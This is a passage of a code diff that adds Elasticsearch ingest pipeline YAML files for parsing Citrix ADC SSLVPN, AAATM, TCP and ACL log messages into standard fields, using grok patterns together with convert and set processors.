ctx.citrix_adc?.log?.vserver?.ip != null && ctx.citrix_adc.log.vserver.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.ip + tag: set_server_ip_from_vserver_ip + copy_from: citrix_adc.log.vserver.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.vserver.port + tag: convert_vserver_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.port + tag: set_server_port_from_vserver_port + copy_from: citrix_adc.log.vserver.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.handshake_time + tag: convert_handshake_time_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: tls.cipher + tag: set_tls_cipher_from_cipher_suite + copy_from: citrix_adc.log.cipher_suite + ignore_empty_value: true + - set: + field: tls.server.issuer + tag: set_tls_server_issuer_from_issuer_name + copy_from: citrix_adc.log.issuer_name + ignore_empty_value: true + - set: + field: tls.server.subject + tag: set_tls_server_subject_from_subject_name + copy_from: citrix_adc.log.subject_name + ignore_empty_value: true + - grok: + if: ctx.citrix_adc?.log?.protocol_version != null && ctx.citrix_adc.log.protocol_version != '' + tag: grok_protocol_version + field: citrix_adc.log.protocol_version + patterns: + - "^%{DATA:tls.version_protocol}v%{DATA:tls.version}$" + ignore_failure: true + - grok: + if: ctx.citrix_adc?.log?.client_version != null && ctx.citrix_adc.log.client_version != '' + tag: grok_protocol_version + field: citrix_adc.log.client_version + patterns: + - "^%{DATA:tls.version_protocol}v%{DATA:tls.version}$" + ignore_failure: true + - set: + field: event.reason + tag: set_event_reason_from_reason + copy_from: citrix_adc.log.reason + ignore_empty_value: true +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/sslvpn_and_aaatm_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/sslvpn_and_aaatm_feature.yml new file mode 100644 index 00000000000..97a08b44c8e --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/sslvpn_and_aaatm_feature.yml @@ -0,0 +1,398 @@ +--- +description: Pipeline for Citrix Native messages of SSLVPN and AAATM feature. +processors: + - grok: + description: Extract fields from message of SSLVPN and AAATM feature. + tag: grok_sslvpn_and_aaatm_feature + field: citrix.extended.message + patterns: + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Browser_type \"%{DATA:citrix_adc.log.browser_type}\" - SSLVPN_client_type %{DATA:citrix_adc.log.sslvpn_client_type} - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Start_time \"%{DATA:citrix_adc.log.start_time}\" - End_time \"%{DATA:citrix_adc.log.end_time}\" - Duration %{DATA:citrix_adc.log.duration} - Http_resources_accessed %{INT:citrix_adc.log.http_resources_accessed} - NonHttp_services_accessed %{INT:citrix_adc.log.non_http_services_accessed} - Total_TCP_connections %{INT:citrix_adc.log.total_tcp_connections} - Total_UDP_flows %{INT:citrix_adc.log.total_udp_flows} - Total_policies_allowed %{INT:citrix_adc.log.total_policies_allowed} - Total_policies_denied %{INT:citrix_adc.log.total_policies_denied} - Total_bytes_send %{INT:citrix_adc.log.total_bytes_send} - Total_bytes_recv %{INT:citrix_adc.log.total_bytes_received} - Total_compressedbytes_send %{INT:citrix_adc.log.total_compressed_bytes_send} - Total_compressedbytes_recv %{INT:citrix_adc.log.total_compressed_bytes_recieved} - Compression_ratio_send %{NUMBER:citrix_adc.log.compression_ratio_send}% - Compression_ratio_recv %{NUMBER:citrix_adc.log.compression_ratio_recieved}% - LogoutMethod \"%{DATA:citrix_adc.log.logout_method}\" - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - SSLRelayAddress %{IP:citrix_adc.log.ssl_relay.address}:%{INT:citrix_adc.log.ssl_relay.port} - customername( %{WORD:citrix_adc.log.customer_name})? - username:domainname %{DATA:citrix_adc.log.username}:%{DATA:citrix_adc.log.domain_name} - applicationName %{WORD:citrix_adc.log.application_name} - startTime \"%{DATA:citrix_adc.log.start_time}\" - connectionId %{WORD:citrix_adc.log.connection_id}$' + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - SSLRelayAddress %{IP:citrix_adc.log.ssl_relay.address}:%{INT:citrix_adc.log.ssl_relay.port} - customername( %{WORD:citrix_adc.log.customer_name})? - username:domainname %{DATA:citrix_adc.log.username}:%{DATA:citrix_adc.log.domain_name} - startTime \"%{DATA:citrix_adc.log.start_time}\" - endTime \"%{DATA:citrix_adc.log.end_time}\" - Duration %{DATA:citrix_adc.log.duration} - Total_bytes_send %{NUMBER:citrix_adc.log.total_bytes_send:int} - Total_bytes_recv %{NUMBER:citrix_adc.log.total_bytes_received:int} - Total_compressedbytes_send %{NUMBER:citrix_adc.log.total_compressed_bytes_send:int} - Total_compressedbytes_recv %{NUMBER:citrix_adc.log.total_compressed_bytes_recieved:int} - Compression_ratio_send %{NUMBER:citrix_adc.log.compression_ratio_send:float}% - Compression_ratio_recv %{NUMBER:citrix_adc.log.compression_ratio_recieved:float}% - connectionId %{WORD:citrix_adc.log.connection_id}( - Total_bytes_wire_send %{NUMBER:citrix_adc.log.total_bytes_wire_send} - Total_bytes_wire_recv %{NUMBER:citrix_adc.log.total_bytes_wire_recieved})?$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - Start_time \"%{DATA:citrix_adc.log.start_time}\" - End_time \"%{GREEDYDATA:citrix_adc.log.end_time}\" - Duration %{DATA:citrix_adc.log.duration} - Total_bytes_send %{NUMBER:citrix_adc.log.total_bytes_send:int} - Total_bytes_recv %{NUMBER:citrix_adc.log.total_bytes_received:int} - Total_compressedbytes_send %{NUMBER:citrix_adc.log.total_compressed_bytes_send:int} - Total_compressedbytes_recv %{NUMBER:citrix_adc.log.total_compressed_bytes_recieved:int} - Compression_ratio_send %{NUMBER:citrix_adc.log.compression_ratio_send:float}% - Compression_ratio_recv %{NUMBER:citrix_adc.log.compression_ratio_recieved:float}% - Access %{WORD:citrix_adc.log.access} - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Last_contact \"%{DATA:citrix_adc.log.last_contact}\" - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - Start_time \"%{DATA:citrix_adc.log.start_time}\" - End_time \"%{GREEDYDATA:citrix_adc.log.end_time}\" - Duration %{DATA:citrix_adc.log.duration} - Total_bytes_send %{NUMBER:citrix_adc.log.total_bytes_send:int} - Total_bytes_recv %{NUMBER:citrix_adc.log.total_bytes_received:int} - Access %{WORD:citrix_adc.log.access} - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^- Denied_by_policy \"%{DATA:citrix_adc.log.policy_violation}\"$' + - '^Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - License_limit %{NUMBER:citrix_adc.log.license_limit:int}$' + - '^%{DATA}%{SPACE}:%{SPACE}%{DATA} - Client%{SPACE}IP %{IP:citrix_adc.log.client_ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Client_security_expression \"%{DATA:citrix_adc.log.client_security_expression}\" -$' + - '^User %{USER:citrix_adc.log.user}%{SPACE}:%{SPACE}- Client%{SPACE}IP %{IP:citrix_adc.log.client_ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Client%{SPACE}security%{SPACE}check%{SPACE}Passed\(%{NUMBER:citrix_adc.log.client_security_check_status:int}\)%{SPACE}on%{SPACE}the%{SPACE}client%{SPACE}machine$' + - '^Xdatalen %{NUMBER:citrix_adc.log.data_length:int} - Xdata %{GREEDYDATA:citrix_adc.log.data}$' + - '^Session%{SPACE}id %{NUMBER:citrix_adc.log.session_id:int} - User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver_ip %{IP:citrix_adc.log.vserver.ip} - Errmsg \"%{DATA:citrix_adc.log.errmsg}\"$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Browser_type \"%{DATA:citrix_adc.log.browser_type}\" - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Start_time \"%{DATA:citrix_adc.log.start_time}\" - End_time \"%{DATA:citrix_adc.log.end_time}\" - Duration %{DATA:citrix_adc.log.duration} - Http_resources_accessed %{INT:citrix_adc.log.http_resources_accessed} - Total_TCP_connections %{INT:citrix_adc.log.total_tcp_connections} - Total_policies_allowed %{INT:citrix_adc.log.total_policies_allowed} - Total_policies_denied %{INT:citrix_adc.log.total_policies_denied} - Total_bytes_send %{DATA:citrix_adc.log.total_bytes_send} - Total_bytes_recv %{DATA:citrix_adc.log.total_bytes_received} - Total_compressedbytes_send %{DATA:citrix_adc.log.total_compressed_bytes_send} - Total_compressedbytes_recv %{DATA:citrix_adc.log.total_compressed_bytes_recieved} - Compression_ratio_send %{NUMBER:citrix_adc.log.compression_ratio_send}% - Compression_ratio_recv %{NUMBER:citrix_adc.log.compression_ratio_recieved}% - LogoutMethod \"%{DATA:citrix_adc.log.logout_method}\" - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^Context %{USERNAME:citrix_adc.log.username}@%{IP:citrix_adc.log.client_ip} - SessionId: %{NUMBER:citrix_adc.log.session_id} - %{HOSTNAME:citrix_adc.log.hostname} User %{USERNAME:citrix_adc.log.user} : Group\(s\) %{DATA:citrix_adc.log.groups} : Vserver %{IP:citrix_adc.log.vserver.ip}:%{NUMBER:citrix_adc.log.vserver.port} - %{DATA:citrix_adc.log.timestamp} : SSO is %{WORD:citrix_adc.log.sso_status} : %{WORD:citrix_adc.log.method} %{URIPATHPARAM:citrix_adc.log.request.path} - -$' + - '^Context %{DATA:citrix_adc.log.username}@%{IP:citrix_adc.log.client_ip}%{SPACE}- SessionId: %{NUMBER:citrix_adc.log.session_id}%{SPACE}- %{HOSTNAME:citrix_adc.log.hostname} User %{DATA:citrix_adc.log.user} : Group\(s\) %{DATA:citrix_adc.log.groups} : Vserver %{IP:citrix_adc.log.vserver.ip}:%{NUMBER:citrix_adc.log.vserver.port} - %{DATA:citrix_adc.log.timestamp} %{DATA:citrix_adc.log.timezone} %{WORD:citrix_adc.log.method} %{DATA:citrix_adc.log.request.path} - -$' + - '^%{GREEDYDATA:citrix_adc.log.message}$' + ignore_failure: true + - date: + field: citrix_adc.log.timestamp + tag: date_timestamp + target_field: citrix_adc.log.timestamp + formats: + - ISO8601 + - MM/dd/yyyy:HH:mm:ss + - yyyy/MM/dd:HH:mm:ss + if: ctx.citrix_adc?.log?.timestamp != null && ctx.citrix_adc.log.timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.client_ip + tag: convert_client_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.client_ip != null && ctx.citrix_adc.log.client_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: client.ip + tag: set_client_ip_from_client_ip + copy_from: citrix_adc.log.client_ip + ignore_empty_value: true + - set: + field: url.domain + tag: set_url_domain_from_hostname + copy_from: citrix_adc.log.hostname + ignore_empty_value: true + - convert: + field: citrix_adc.log.total_bytes_received + tag: convert_total_bytes_received_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.bytes + tag: set_destination_bytes_from_total_bytes_received + copy_from: citrix_adc.log.total_bytes_received + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.destination?.ip != null && ctx.citrix_adc.log.destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_destination_ip + copy_from: citrix_adc.log.destination.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.port + tag: convert_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_port_from_destination_port + copy_from: citrix_adc.log.destination.port + ignore_empty_value: true + - set: + field: error.message + tag: set_error_message_from_errmsg + copy_from: citrix_adc.log.errmsg + ignore_empty_value: true + - date: + field: citrix_adc.log.end_time + tag: date_end_time + target_field: citrix_adc.log.end_time + formats: + - yyyy/MM/dd:HH:mm:ss + - MM/dd/yyyy:HH:mm:ss + - ISO8601 + if: ctx.citrix_adc?.log?.end_time != null && ctx.citrix_adc.log.end_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.end + tag: set_event_end_from_end_time + copy_from: citrix_adc.log.end_time + ignore_empty_value: true + - date: + field: citrix_adc.log.start_time + tag: date_start_time + target_field: citrix_adc.log.start_time + formats: + - yyyy/MM/dd:HH:mm:ss + - MM/dd/yyyy:HH:mm:ss + - ISO8601 + if: ctx.citrix_adc?.log?.start_time != null && ctx.citrix_adc.log.start_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.start + tag: set_event_start_from_start_time + copy_from: citrix_adc.log.start_time + ignore_empty_value: true + - set: + field: group.name + tag: set_group_name_from_groups + copy_from: citrix_adc.log.groups + ignore_empty_value: true + - convert: + field: citrix_adc.log.vserver.ip + tag: convert_vserver_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.vserver?.ip != null && ctx.citrix_adc.log.vserver.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.ip + tag: set_server_ip_from_vserver_ip + copy_from: citrix_adc.log.vserver.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.vserver.port + tag: convert_vserver_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.port + tag: set_server_port_from_vserver_port + copy_from: citrix_adc.log.vserver.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.total_bytes_send + tag: convert_total_bytes_send_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.bytes + tag: set_source_bytes_from_total_bytes_send + copy_from: citrix_adc.log.total_bytes_send + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.ip + tag: convert_source_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.source?.ip != null && ctx.citrix_adc.log.source.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_source_ip + copy_from: citrix_adc.log.source.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.nat.ip + tag: convert_nat_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.nat?.ip != null && ctx.citrix_adc.log.nat.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.nat.ip + tag: set_source_nat_ip_from_nat_ip + copy_from: citrix_adc.log.nat.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.port + tag: convert_source_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_source_port + copy_from: citrix_adc.log.source.port + ignore_empty_value: true + - set: + field: user.name + tag: set_user_name_from_user + copy_from: citrix_adc.log.user + ignore_empty_value: true + - convert: + field: citrix_adc.log.ssl_relay.address + tag: convert_ssl_relay_address_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.ssl_relay?.address != null && ctx.citrix_adc.log.ssl_relay.address != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.ssl_relay.port + tag: convert_ssl_relay_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.session_id + tag: convert_session_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_tcp_connections + tag: convert_total_tcp_connections_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_udp_flows + tag: convert_total_udp_flows_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_policies_allowed + tag: convert_total_policies_allowed_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_bytes_wire_send + tag: convert_total_bytes_wire_send_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_bytes_wire_recieved + tag: convert_total_bytes_wire_recieved_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_policies_denied + tag: convert_total_policies_denied_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_compressed_bytes_send + tag: convert_total_compressed_bytes_send_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_compressed_bytes_recieved + tag: convert_total_compressed_bytes_recieved_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.compression_ratio_send + tag: convert_compression_ratio_send_to_double + type: double + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.compression_ratio_recieved + tag: convert_compression_ratio_recieved_to_double + type: double + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.license_limit + tag: convert_license_limit_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.client_security_check_status + tag: convert_client_security_check_status_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.data_length + tag: convert_data_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: user.domain + tag: set_user_domain_from_domain_name + copy_from: citrix_adc.log.domain_name + ignore_empty_value: true +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/tcp_and_acl_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/tcp_and_acl_feature.yml new file mode 100644 index 00000000000..561b6ebb1f3 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/tcp_and_acl_feature.yml @@ -0,0 +1,341 @@ +--- +description: Pipeline for Citrix Native messages of TCP and ACL feature. +processors: + - grok: + description: Extract fields from message of TCP and ACL feature. + tag: grok_tcp_and_acl_feature + field: citrix.extended.message + patterns: + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - NatIP %{IP:citrix_adc.log.nat.ip}:%{INT:citrix_adc.log.nat.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - Delink Time %{DATA:citrix_adc.log.delink_time}(?: %{DATA:citrix_adc.log.delink_timezone})? - Total_bytes_send %{INT:citrix_adc.log.total_bytes_send:long} - Total_bytes_recv %{INT:citrix_adc.log.total_bytes_received:long}$' + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - NatIP %{IP:citrix_adc.log.nat.ip}:%{INT:citrix_adc.log.nat.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - Delink Time %{DATA:citrix_adc.log.delink_time}(?: %{DATA:citrix_adc.log.delink_timezone})? Total_bytes_send %{INT:citrix_adc.log.total_bytes_send:long} - Total_bytes_recv %{INT:citrix_adc.log.total_bytes_received:long}$' + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - Start Time %{DATA:citrix_adc.log.start_time}(?: %{DATA:citrix_adc.log.start_time_timezone})? - End Time %{DATA:citrix_adc.log.end_time}(?: %{DATA:citrix_adc.log.end_time_timezone})? - Total_bytes_send %{INT:citrix_adc.log.total_bytes_send:long} - Total_bytes_recv %{INT:citrix_adc.log.total_bytes_received:long}$' + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.original_destination.ip}:%{INT:citrix_adc.log.original_destination.port} - NatIP %{IP:citrix_adc.log.nat.ip}:%{INT:citrix_adc.log.nat.port} - Destination %{IP:citrix_adc.log.translated_destination.ip}:%{INT:citrix_adc.log.translated_destination.port} - Start Time %{DATA:citrix_adc.log.start_time}(?: %{DATA:citrix_adc.log.start_time_timezone})? - Delink Time %{DATA:citrix_adc.log.delink_time}(?: %{DATA:citrix_adc.log.delink_timezone})? - Total_bytes_send %{INT:citrix_adc.log.total_bytes_send:long} - Total_bytes_recv %{INT:citrix_adc.log.total_bytes_received:long} - Closure%{SPACE}Reason %{GREEDYDATA:citrix_adc.log.closure_reason}$' + - '^Source %{IP:citrix_adc.log.source.ip} --> Destination %{IP:citrix_adc.log.destination.ip} - Protocol %{WORD:citrix_adc.log.protocol} - Type %{INT:citrix_adc.log.type} - Code %{INT:citrix_adc.log.code} - Time%{SPACE}Stamp %{DATA:citrix_adc.log.timestamp}%{SPACE}\(ms\) - Hitcount %{INT:citrix_adc.log.hit.count:int} - Hit%{SPACE}Rule %{GREEDYDATA:citrix_adc.log.hit.rule} - Action %{WORD:citrix_adc.log.action} - Data$' + - 